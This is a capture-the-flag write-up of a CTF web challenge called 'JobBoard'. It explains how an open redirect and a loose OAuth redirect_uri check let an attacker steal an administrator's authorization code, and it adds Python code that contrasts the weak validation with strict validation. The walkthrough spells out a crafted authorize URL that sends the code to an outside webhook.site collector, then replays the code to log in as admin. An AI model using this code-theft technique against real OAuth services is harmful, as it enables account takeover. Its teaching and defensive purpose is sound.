Writeup DGA - CTF - JobBoard

This article describes my solution for the 200-point challenge called “JobBoard”.

Introduction

While looking for a job as a cybersecurity engineer, you found a website offering very interesting job postings, but special credentials are required to access it.

Can you find some? Apparently the admin account lets you view the upcoming state cybersecurity job offers at DGA MI?

Start

We have at our disposal a platform for finding a job. You need to be logged in to see the jobs. By clicking on the Browse job tab, we are offered a login/password pair, test:test. In addition, there is an interesting piece of information.

Just login with OAuth using the tests credentials : test:test

We already learn that authentication is done via the OAuth protocol. OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites without giving them their passwords.

As soon as we are logged in, we can see a job list. One of them requires administrator rights to view (it is grayed out and titled Secret position).

Clicking on a job title redirects, for every job listed, to a link of the following form.

http://jobboard2.chall.malicecyber.com/safelink/http://example.com/

It’s kind of weird.

I was already aware of some of the vulnerabilities in the OAuth protocol and this link made me think of something: open redirect attacks.

An open redirect occurs when an application takes a parameter and redirects the user to the parameter's value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.

The principle is to choose the redirection URL that a platform the target considers trustworthy will forward the user to. This makes it possible to carry out phishing attacks starting from a trusted URL, or to retrieve data/tokens from authentication protocols in order to access the victims' personal information.

Let’s analyze the authentication procedure with OAuth.

The address below displays a request for connection authorization. There are two things to note in this URL:

http://jobboard2.chall.malicecyber.com/oauth/authorize?client_id=svvhKlyEA7qODbl16JTUPQNz&response_type=code&redirect_uri=http%3A%2F%2Fjobboard2.chall.malicecyber.com%2Fconnect%2Fauth%2Fcallback&scope=profile

As soon as the user presses the Accept button, an HTTP POST request is made. Then an HTTP GET request is performed on the URL below, with the value obtained from the HTTP POST response passed as the code query-string parameter.

http://jobboard2.chall.malicecyber.com/connect/auth/callback?code=3Z2jHh9PQ7nC2nf5lJ8mG8i4hCB7ttjPYsXyC6mkpPjvYn9C

Finally, a last HTTP GET request is made. In particular, this is the request that sets several headers.

The goal of the attack we are going to perform is to use the /safelink route to place a malicious URL so that we retrieve the administrator's code (the one from the second request).

It will be possible to send our malicious link via the contact form at our disposal on the platform.

Exploitation

Once again I’m going to use webhook.site to analyze the requests made to the endpoint.

The URL below contains the redirection to the tool that will let me retrieve the value of the query string code. Note that the / character is double-encoded: the first decode turns %252F into %2F rather than into /, which would have broken the path.

http://jobboard.chall.malicecyber.com/oauth/authorize?client_id=svvhKlyEA7qODbl16JTUPQNz&response_type=code&redirect_uri=http:%2F%2Fjobboard.chall.malicecyber.com%2Fsafelink%2Fhttps%3A%252F%252Fwebhook.site%252Ff806734c-e43d-45cd-a4a1-f6df2d774f7b%252F&scope=profile
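The two ingredients of this attack, an open redirect on /safelink and an authorization server that only checks the redirect_uri loosely, are both validation failures. The following Python example is added here and is not code from the writeup or the challenge: it reconstructs how the authorize URL above is decoded server-side (one percent-decode by the query parser, a second one inside /safelink, which is why the target's slashes are sent as %252F), contrasts a naive prefix check on redirect_uri with an exact match against the client's registered URIs, and applies the host allowlist a /safelink handler should enforce. The client registry and the allowlist are assumptions, and the attack URL is modeled on the one in the writeup with the hostname normalised to jobboard2 so it lines up with the callback registered earlier in the post.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed registry for this example: each OAuth client maps to the exact
# redirect URIs registered for it (assumption, not the challenge's real config).
REGISTERED_REDIRECT_URIS = {
    "svvhKlyEA7qODbl16JTUPQNz": {
        "http://jobboard2.chall.malicecyber.com/connect/auth/callback",
    },
}

# Constructed allowlist of hosts /safelink may forward to (assumption: the
# challenge has no such list, which is precisely the open redirect).
SAFELINK_ALLOWED_HOSTS = {"jobboard2.chall.malicecyber.com", "example.com"}

# Authorize URL modeled on the writeup. The '/' characters inside the safelink
# target are double-encoded (%252F) so that the first decode leaves %2F intact.
ATTACK_AUTHORIZE_URL = (
    "http://jobboard2.chall.malicecyber.com/oauth/authorize"
    "?client_id=svvhKlyEA7qODbl16JTUPQNz&response_type=code"
    "&redirect_uri=http%3A%2F%2Fjobboard2.chall.malicecyber.com%2Fsafelink%2F"
    "https%3A%252F%252Fwebhook.site%252Ff806734c-e43d-45cd-a4a1-f6df2d774f7b%252F"
    "&scope=profile"
)

# The legitimate authorize URL from the login flow, for comparison.
LEGIT_AUTHORIZE_URL = (
    "http://jobboard2.chall.malicecyber.com/oauth/authorize"
    "?client_id=svvhKlyEA7qODbl16JTUPQNz&response_type=code"
    "&redirect_uri=http%3A%2F%2Fjobboard2.chall.malicecyber.com%2Fconnect%2Fauth%2Fcallback"
    "&scope=profile"
)


def parse_authorize_request(url):
    """Return (client_id, redirect_uri) as the authorization server sees them,
    i.e. after the single percent-decode applied by the query-string parser."""
    params = parse_qs(urlsplit(url).query)
    return params["client_id"][0], params["redirect_uri"][0]


def naive_redirect_uri_check(client_id, redirect_uri):
    """Weak validation: accept any URI under the registered callback's origin.
    An open redirect anywhere on that origin turns this into a code leak."""
    for registered in REGISTERED_REDIRECT_URIS.get(client_id, ()):
        parts = urlsplit(registered)
        origin = f"{parts.scheme}://{parts.netloc}/"
        if redirect_uri.startswith(origin):
            return True
    return False


def strict_redirect_uri_check(client_id, redirect_uri):
    """Correct validation: exact string match against the registered URIs."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, set())


def safelink_target(path):
    """Resolve the forward target of a /safelink/<target> path. The target
    arrived with its slashes as %2F (the %252F survived the first decode),
    so this second unquote yields the URL the browser would actually visit."""
    prefix = "/safelink/"
    if not path.startswith(prefix):
        raise ValueError("not a safelink path")
    return unquote(path[len(prefix):])


def safelink_allowed(path):
    """Allowlist check a /safelink handler should apply before redirecting."""
    target = urlsplit(safelink_target(path))
    return target.scheme in ("http", "https") and target.hostname in SAFELINK_ALLOWED_HOSTS


def classify(url):
    """Run both redirect_uri checks and, if the URI points at /safelink,
    resolve and check the final destination."""
    client_id, redirect_uri = parse_authorize_request(url)
    result = {
        "redirect_uri": redirect_uri,
        "naive_accepts": naive_redirect_uri_check(client_id, redirect_uri),
        "strict_accepts": strict_redirect_uri_check(client_id, redirect_uri),
    }
    path = urlsplit(redirect_uri).path
    if path.startswith("/safelink/"):
        result["safelink_target"] = safelink_target(path)
        result["safelink_allowed"] = safelink_allowed(path)
    return result


if __name__ == "__main__":
    for name, url in (("legitimate", LEGIT_AUTHORIZE_URL), ("attack", ATTACK_AUTHORIZE_URL)):
        print(name, classify(url))
```

Running it shows the crafted redirect_uri passing the prefix check but failing the exact match, and the decoded /safelink destination landing on a host outside the allowlist; either of the two strict checks alone would have stopped the code from leaving the site.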

A few seconds later, I retrieve this code.

/?code=959005d2782349217bb2e361fba90902536a452eb01b990e

Then, I build the URL of the second HTTP GET request by appending the retrieved code to it.

http://jobboard2.chall.malicecyber.com/connect/auth/callback?code=959005d2782349217bb2e361fba90902536a452eb01b990e

By entering this URL in the browser, the third request is made and logs us in as administrator. This lets us see the job offer that was previously grayed out. The offer is titled DontRollYourOwn, which is the flag that validates this challenge.